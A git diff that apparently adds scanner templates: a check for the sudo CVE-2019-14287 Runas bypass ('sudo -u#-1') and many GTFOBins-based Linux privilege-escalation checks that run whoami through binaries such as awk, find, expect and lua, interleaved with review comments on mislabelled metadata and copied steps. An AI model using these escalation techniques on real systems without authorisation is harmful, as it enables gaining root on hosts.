diff --git a/code/cves/2023/CVE-2019-14287.yaml b/code/cves/2023/CVE-2019-14287.yaml
new file mode 100644
index 0000000000..25399daf6d
--- /dev/null
+++ b/code/cves/2023/CVE-2019-14287.yaml
@@ -0,0 +1,38 @@
+id: CVE-2019-14287
+
+info:
+ name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
+ author: princechaddha
+ severity: high
+ description: |
+ In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
+ - https://www.exploit-db.com/exploits/47502
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: canonical
+ product: ubuntu_linux
+ tags: cve,cve2019,sudo,ubuntu,linux,privesc,local
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo -u#-1 whoami
+
+ matchers:
+ - type: dsl
+ dsl:
+ - '!contains(code_1_response, "root")'
+ - 'contains(code_2_response, "root")'
+ condition: and
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml
new file mode 100644
index 0000000000..5d33e08659
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml
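Review bot: The template's metadata contradicts its own description: `name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel`, `vendor: canonical` and `product: ubuntu_linux` describe an unrelated Ubuntu kernel issue, while the id, description and tags are the sudo < 1.8.28 Runas bypass, and the file sits under `code/cves/2023/` despite a 2019 id. Use a name that matches the description, such as `name: Sudo < 1.8.28 - Runas Privilege Bypass (CVE-2019-14287)`, point vendor/product at sudo (the NVD CPE uses `sudo_project` / `sudo`), and move the file to the year directory that matches the id. The second code step runs `sudo -u#-1 whoami` without `-n`, so on a host where sudo requires a password the step can block on the prompt instead of failing; `sudo -n -u#-1 whoami` keeps the run non-interactive. Note also that a `root` result from code_2 does not by itself establish CVE-2019-14287: a user with an unrestricted sudo rule gets `root` from a fully patched sudo as well, so the match means "sudo ran whoami as root", not a confirmed policy bypass, and the description or a comment on the matcher should say so.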
@@ -0,0 +1,46 @@ +id: privilege-escalation-aa-exec + +info: + name: aa-exec - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/aa-exec/ + metadata: + verified: true + tags: code,linux,aa-exec,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + aa-exec whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo aa-exec whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml new file mode 100644 index 0000000000..82d415caa8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ash + +info: + name: Ash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ash/ + metadata: + verified: true + tags: code,linux,ash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo ash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml new file mode 100644 index 0000000000..14ea698598 --- /dev/null 
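Review bot: The `#SUDO` step in this hunk runs `sudo aa-exec whoami` with no `-n`, so if the scanning user's sudo rule requires a password the step waits on the prompt rather than returning; `sudo -n aa-exec whoami` fails fast instead. The same applies to every `sudo` step in the sibling templates of this commit (ash, awk, bash, cdist, choom, cpulimit, csh, csvtool, dash, dc, distcc, elvish, enscript, env, expect, find, fish, flock, gawk, grc, ionice, julia, lftp, ltrace, lua, mawk, multitime, mysql, nawk, nice, node). The `contains(code_N_response, "root")` DSL checks are substring matches, so any output that merely includes the text root (an error message naming `/root`, or an account such as rootadmin) counts as a hit; comparing the trimmed output, e.g. `trim_space(code_2_response) == "root"`, is the stricter check. Minor style, also shared by the sibling files: the section comments are written `#SUID` / `#SUDO` with no space after the hash, and each file ends without a trailing newline.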
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-awk + +info: + name: awk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/awk/ + metadata: + verified: true + tags: code,linux,awk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + awk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo awk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml new file mode 100644 index 0000000000..1dbef3a18b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-bash + +info: + name: Bash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/bash/ + metadata: + verified: true + tags: code,linux,bash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + bash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo bash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml new file mode 100644 index 0000000000..e6fee4f371 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-cdist + +info: + name: Cdist - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/cdist/ + metadata: + verified: true + tags: code,linux,cdist,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + cdist shell -s whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo cdist shell -s whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml new file mode 100644 index 0000000000..6bdb596aeb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-choom + +info: + name: choom - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/choom/ + metadata: + verified: true + tags: code,linux,choom,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + choom -n 0 whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo choom -n 0 whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml new file mode 100644 index 0000000000..22596354a6 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-cpulimit + +info: + name: CPUlimit - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/cpulimit/ + metadata: + verified: true + tags: code,linux,cpulimit,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + cpulimit -l 100 -f whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo cpulimit -l 100 -f whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml new file mode 100644 index 0000000000..0b59b82c11 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-csh + +info: + name: csh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/csh/ + metadata: + verified: true + tags: code,linux,csh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + csh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo csh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml new file mode 100644 index 0000000000..451c4bd3aa --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-csvtool + +info: + name: csvtool - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/csvtool/ + metadata: + verified: true + tags: code,linux,csvtool,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + csvtool call 'whoami;false' /etc/passwd + + #SUDO + - engine: + - sh + - bash + source: | + sudo csvtool call 'whoami;false' /etc/passwd + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml new file mode 100644 index 0000000000..65a3ec45ef --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-dash + +info: + name: Dash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/dash/ + metadata: + verified: true + tags: code,linux,dash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + dash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo dash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml new file mode 100644 index 0000000000..bab777f8c4 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-dc + +info: + name: dc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/dc/ + metadata: + verified: true + tags: code,linux,dc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + dc -e '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo dc -e '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml new file mode 100644 index 0000000000..fb11f719f0 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-distcc + +info: + name: distcc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/distcc/ + metadata: + verified: true + tags: code,linux,distcc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + distcc whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo distcc whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml new file mode 100644 index 0000000000..e21e3bf5dd --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-elvish + +info: + name: elvish - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/elvish/ + metadata: + verified: true + tags: code,linux,elvish,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + elvish -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo elvish -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml new file mode 100644 index 0000000000..69871d1189 
--- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-enscript + +info: + name: enscript - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/enscript/ + metadata: + verified: true + tags: code,linux,enscript,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + enscript /dev/null -qo /dev/null -I 'whoami >&2' + + #SUDO + - engine: + - sh + - bash + source: | + sudo enscript /dev/null -qo /dev/null -I 'whoami >&2' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml new file mode 100644 index 0000000000..5d69084b32 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-env + +info: + name: env - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/env/ + metadata: + verified: true + tags: code,linux,env,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + expect -c 'spawn whoami;interact' + + #SUDO + - engine: + - sh + - bash + source: | + sudo expect -c 'spawn whoami;interact' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
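Review bot: The file is added as `privilege-escalation-encscript.yaml` (see the `+++` header) while the template declares `id: privilege-escalation-enscript` and references the gtfobins `enscript/` page, so the filename has a typo and should be `privilege-escalation-enscript.yaml` to keep id and path aligned like the other templates. The SUID and SUDO steps send the result to stderr (`-I 'whoami >&2'`); whether `code_2_response` / `code_3_response` include stderr is not visible in this hunk, so confirm the matcher can actually see that output, otherwise the template can never fire. A one-line comment above those steps, `# whoami output is on stderr; matcher relies on stderr being captured`, would make the dependency explicit.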
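Review bot: The `#SUID` and `#SUDO` sources in `privilege-escalation-env.yaml` run `expect -c 'spawn whoami;interact'`, not `env`; the body appears copied from the expect template, so this file checks the wrong binary and would report env as escalatable on a host where only expect is. Following the pattern of the other templates and the referenced gtfobins page, the two steps should be `env whoami` and `sudo -n env whoami`. As written, `interact` also hands the spawned process to the controlling terminal, which can stall a non-interactive run.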
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml new file mode 100644 index 0000000000..b6eca30cb7 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-expect + +info: + name: expect - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/expect/ + metadata: + verified: true + tags: code,linux,expect,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + expect -c 'spawn whoami;interact' + + #SUDO + - engine: + - sh + - bash + source: | + sudo expect -c 'spawn whoami;interact' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml new file mode 100644 index 0000000000..09574ac2ad --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml 
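Review bot: Both privileged steps end with `interact`, which attaches the spawned `whoami` to the controlling terminal and waits for it; under a runner with no tty this may stall or exit with an error instead of returning the output, so the template's result on headless hosts is unreliable. Ending the script with `expect eof` rather than `interact` (`expect -c 'spawn whoami;expect eof'`) lets the spawned process finish and exit cleanly; verify that the runner still captures the spawned output in `code_2_response` after that change. As in the sibling templates, the `sudo` step should carry `-n` so a password prompt fails instead of blocking.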
@@ -0,0 +1,46 @@ +id: privilege-escalation-find + +info: + name: find - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/find/ + metadata: + verified: true + tags: code,linux,find,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + find . -exec whoami \; -quit + + #SUDO + - engine: + - sh + - bash + source: | + sudo find . -exec whoami \; -quit + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml new file mode 100644 index 0000000000..62b32f6ecb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-fish + +info: + name: fish - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/fish/ + metadata: + verified: true + tags: code,linux,fish,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + fish -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo fish -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml new file mode 100644 index 0000000000..8864b6e9ba 
--- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-flock + +info: + name: Flock - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/flock/ + metadata: + verified: true + tags: code,linux,flock,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + flock -u / whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo flock -u / whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml new file mode 100644 index 0000000000..20348ee4fb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-gawk + +info: + name: gawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/gawk/ + metadata: + verified: true + tags: code,linux,gawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + gawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo gawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml new file mode 100644 index 0000000000..eaf176057e --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-grc + +info: + name: grc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/grc/ + metadata: + verified: true + tags: code,linux,grc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + grc --pty whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo grc --pty whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml new file mode 100644 index 0000000000..c3d8dc886a --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-ionice + +info: + name: ionice - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ionice/ + metadata: + verified: true + tags: code,linux,ionice,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ionice whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ionice whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml new file mode 100644 index 0000000000..07a88f8342 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-julia + +info: + name: Julia - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/julia/ + metadata: + verified: true + tags: code,linux,julia,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + julia -e 'run(`whoami`)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo julia -e 'run(`whoami`)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml new file mode 100644 index 0000000000..48240ca4da 
--- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-lftp + +info: + name: lftp - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/lftp/ + metadata: + verified: true + tags: code,linux,lftp,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + lftp -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo lftp -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml new file mode 100644 index 0000000000..de12f8c961 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ltrace + +info: + name: ltrace - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ltrace/ + metadata: + verified: true + tags: code,linux,ltrace,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ltrace -b -L whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ltrace -b -L whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml new file mode 100644 index 0000000000..560b16f07a --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-lua + +info: + name: lua - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/lua/ + metadata: + verified: true + tags: code,linux,lua,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + lua -e 'os.execute("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo lua -e 'os.execute("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml new file mode 100644 index 0000000000..d830a2fa96 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-mawk + +info: + name: mawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/mawk/ + metadata: + verified: true + tags: code,linux,mawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + mawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo mawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml new file mode 100644 index 0000000000..38878f634f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-multitime + +info: + name: Multitime - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/multitime/ + metadata: + verified: true + tags: code,linux,multitime,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + multitime whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo multitime whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
